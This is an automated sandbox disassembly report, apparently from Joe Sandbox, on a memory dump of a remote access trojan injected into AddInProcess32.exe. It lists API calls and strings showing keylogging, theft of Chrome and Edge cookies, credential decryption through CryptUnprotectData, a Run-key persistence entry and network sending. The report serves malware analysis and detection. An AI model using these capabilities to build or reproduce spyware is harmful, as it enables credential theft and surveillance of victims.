                                                      • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                      • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                                      • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                      • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                                      APIs
                                                      • _strpbrk.LIBCMT ref: 0044E7B8
                                                      • _free.LIBCMT ref: 0044E8D5
                                                        • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                        • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                                        • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                      • String ID: *?$.
                                                      • API String ID: 2812119850-3972193922
                                                      • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                      • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                      • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                      • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CountEventTick
                                                      • String ID: !D@$NG
                                                      • API String ID: 180926312-2721294649
                                                      • Opcode ID: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                      • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                      • Opcode Fuzzy Hash: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                      • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                      APIs
                                                      • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                        • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                        • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                      • String ID: XQG$NG$PG
                                                      • API String ID: 1634807452-3565412412
                                                      • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                      • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                      • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                      • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443515
                                                      • _free.LIBCMT ref: 004435E0
                                                      • _free.LIBCMT ref: 004435EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      • API String ID: 2506810119-760905667
                                                      • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                      • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                      • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                      • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                      • GetLastError.KERNEL32 ref: 0044B9B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                      • String ID: PkGNG
                                                      • API String ID: 2456169464-263838557
                                                      • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                      • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                      • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                      • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                        • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                        • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                        • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                        • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                      • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                      • String ID: /sort "Visit Time" /stext "$0NG
                                                      • API String ID: 368326130-3219657780
                                                      • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                      • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                      • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                      • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00416330
                                                        • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                        • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                        • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                        • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcslen$CloseCreateValue
                                                      • String ID: !D@$okmode$PG
                                                      • API String ID: 3411444782-3370592832
                                                      • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                      • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                      • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                      • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                      APIs
                                                        • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                      Strings
                                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                      • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                      • API String ID: 1174141254-1980882731
                                                      • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                      • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                      • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                      • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                      APIs
                                                        • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                      Strings
                                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                      • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                      • API String ID: 1174141254-1980882731
                                                      • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                      • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                      • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                      • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                                      • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                                      • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                                        • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                        • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread$LocalTimewsprintf
                                                      • String ID: Offline Keylogger Started
                                                      • API String ID: 465354869-4114347211
                                                      • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                      • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                      • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                      • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                      APIs
                                                        • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                        • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                      • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                      • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread$LocalTime$wsprintf
                                                      • String ID: Online Keylogger Started
                                                      • API String ID: 112202259-1258561607
                                                      • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                      • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                      • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                      • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                      APIs
                                                      • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                      • API String ID: 481472006-3277280411
                                                      • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                      • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                      • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                      • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                      • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                      Strings
                                                      • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$EventLocalThreadTime
                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                      • API String ID: 2532271599-1507639952
                                                      • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                      • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                      • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                      • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: CryptUnprotectData$crypt32
                                                      • API String ID: 2574300362-2380590389
                                                      • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                      • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                      • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                      • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                                      • GetLastError.KERNEL32 ref: 0044C316
                                                      • __dosmaperr.LIBCMT ref: 0044C31D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                      • String ID: PkGNG
                                                      • API String ID: 2336955059-263838557
                                                      • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                      • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                                      • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                      • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                      • CloseHandle.KERNEL32(?), ref: 004051CA
                                                      • SetEvent.KERNEL32(?), ref: 004051D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEventHandleObjectSingleWait
                                                      • String ID: Connection Timeout
                                                      • API String ID: 2055531096-499159329
                                                      • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                      • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                      • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                      • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-1866435925
                                                      • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                      • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                      • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                      • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                      APIs
                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                                      • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FormatFreeLocalMessage
                                                      • String ID: @J@$PkGNG
                                                      • API String ID: 1427518018-1416487119
                                                      • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                      • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                                      • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                      • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                                      APIs
                                                      • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 00413888
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                      • API String ID: 1818849710-1051519024
                                                      • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                      • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                      • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                      • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                        • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                        • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                      • String ID: bad locale name
                                                      • API String ID: 3628047217-1405518554
                                                      • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                      • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                      • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                      • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                      APIs
                                                      • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                      • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                      • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: Control Panel\Desktop
                                                      • API String ID: 1818849710-27424756
                                                      • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                      • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                      • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                      • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                      • ShowWindow.USER32(00000009), ref: 00416C9C
                                                      • SetForegroundWindow.USER32 ref: 00416CA8
                                                        • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                        • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                        • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                      • String ID: !D@
                                                      • API String ID: 3446828153-604454484
                                                      • Opcode ID: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                                      • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                      • Opcode Fuzzy Hash: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
